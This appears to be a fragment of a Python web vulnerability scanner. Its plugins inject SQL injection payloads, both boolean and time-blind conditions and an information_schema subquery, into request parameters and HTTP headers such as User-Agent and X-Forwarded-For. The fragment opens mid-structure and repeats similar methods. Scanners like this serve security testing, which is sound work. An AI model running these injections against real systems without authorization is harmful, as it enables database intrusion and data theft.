}, } reqs = [] for k, v in header_msg.items(): if self.output(v.get("msg")): logger.debug("start {} inject ".format(k)) headers = copy.deepcopy( self.dictdata.get("request").get("headers")) if k not in headers.keys(): headers[k] = v.get("default") for payload, search_str, method in [('\'"\(', None, "a") ] + payloads: headers_withpayload = copy.deepcopy(headers) headers_withpayload[k] = headers_withpayload[ k] + payload if method == "a" else payload req = self.parser.generaterequest( {"headers": headers_withpayload}) reqs.append((req, (payload, search_str, k, v.get("msg")))) mythread(self.header_inject, reqs, cmd_line_options.threads)
def verify(self): if self.dictdata.get("url").get("extension").lower() in notAcceptedExt: return self.parser = dictdata_parser(self.dictdata) # args inject params = self.dictdata.get("request").get("params").get("params_url") + \ self.dictdata.get("request").get("params").get("params_body") if params: for param in params: self.param = param self.injectstatus = False payloads = copy.deepcopy(self.payloads_alpha) + copy.deepcopy( self.payloads_digit) mythread(self.args_inject, payloads, cmd_line_options.threads) # header inject if not plugin_set.get("sqli").get("header_inject"): return header_msg = { "User-Agent": { "msg": "sqli_timeblind_ua", "default": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36" }, "Referer": { "msg": "sqli_timeblind_referer", "default": "https://www.qq.com/search" }, "X-Forwarded-For": { "msg": "sqli_timeblind_xff", "default": "12.40.9.144" }, "Real-Ip": { "msg": "sqli_timeblind_ri", "default": "2.40.9.144" }, "X-Forwarded-Host": { "msg": "sqli_timeblind_xfh", "default": "2.40.9.144" }, } reqs = [] payloads = copy.deepcopy(self.payloads_alpha) for k, v in header_msg.items(): if self.output(v.get("msg")): logger.debug("start timeblind {} inject ".format(k)) headers = copy.deepcopy( self.dictdata.get("request").get("headers")) if k not in headers.keys(): headers[k] = v.get("default") for test_payload in payloads: reqs.append((headers, k, v, test_payload)) # for test in payloads: # headers_withpayload = copy.deepcopy(headers) # reqs.append() # headers_withpayload[k] = headers_withpayload[k] + payload if method == "a" else payload # req =self.parser.generaterequest({"headers": headers_withpayload}) # reqs.append((req, (payload, search_str, k, v.get("msg")))) mythread(self.headers_inject, reqs, cmd_line_options.threads)
def verify(self): if self.dictdata.get("url").get("extension").lower() in notAcceptedExt: return self.parser = dictdata_parser(self.dictdata) # send again . to find dynamic text self.dynamic = [] r = request(**self.parser.getrawrequest()) if r != None: ret = findDynamicContent( self.parser.getresponsebody().decode(errors="ignore"), r.text) if ret: self.dynamic.extend(ret) if self.dictdata.get("response").get("mime_stated") == "HTML": self.text = getFilteredPageContent( removeDynamicContent(r.text, self.dynamic)) else: self.text = removeDynamicContent(r.text, self.dynamic) else: return # test url and body params sql_flag = [ "' and '{0}'='{1}", '" and "{0}"="{1}', ] # url and body params = self.dictdata.get("request").get("params").get("params_url") + \ self.dictdata.get("request").get("params").get("params_body") if params: for param in params: success = False payloads = copy.deepcopy(sql_flag) if param.get("value") in ["desc", "asc"]: payloads += [ ",if('{0}'='{1}',1,(select 1 from information_schema.tables))" ] for payload in payloads: random_str = get_random_str(2).lower() payload_right = payload.format(random_str + "a", random_str + "a") payload_false = payload.format(random_str + "b", random_str + "c") req_true = self.parser.getreqfromparam( param, "a", payload_right) req_false = self.parser.getreqfromparam( param, "a", payload_false) if self.inject(req_false, req_true, payload_right, payload_false, param.get("name")): success = True break if not success and str(param.get("value")).isdigit(): param_value = param.get("value") random_num = random.randint(2, 8) payloads_num = [ ("/0", "*1"), ("/**/and+{0}={1}".format(random_num, random_num + 1), "/**/and+{0}={1}".format(random_num, random_num)), ] for payload_false, payload_right in payloads_num: req_true = self.parser.getreqfromparam( param, "a", payload_right) req_false = self.parser.getreqfromparam( param, "a", payload_false) if self.inject(req_false, req_true, param_value + payload_right, param_value + payload_false, param.get("name")): break pass # host header 部分 if not plugin_set.get("sqli").get("header_inject"): return header_msg = { "User-Agent": { "msg": "sqli_boolen_ua", "default": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36" }, "Referer": { "msg": "sqli_boolen_referer", "default": "https://www.qq.com/search" }, "X-Forwarded-For": { "msg": "sqli_boolen_xff", "default": "12.40.9.144" }, "Real-Ip": { "msg": "sqli_boolen_ri", "default": "2.40.9.144" }, "X-Forwarded-Host": { "msg": "sqli_boolen_xfh", "default": "2.40.9.144" }, } reqs = [] for k, v in header_msg.items(): if self.output(v.get("msg")): logger.debug("start {} inject ".format(k)) headers = copy.deepcopy( self.dictdata.get("request").get("headers")) if k not in headers.keys(): headers[k] = v.get("default") reqs.append((headers, k, v)) mythread(self.inject_headers, reqs, cmd_line_options.threads)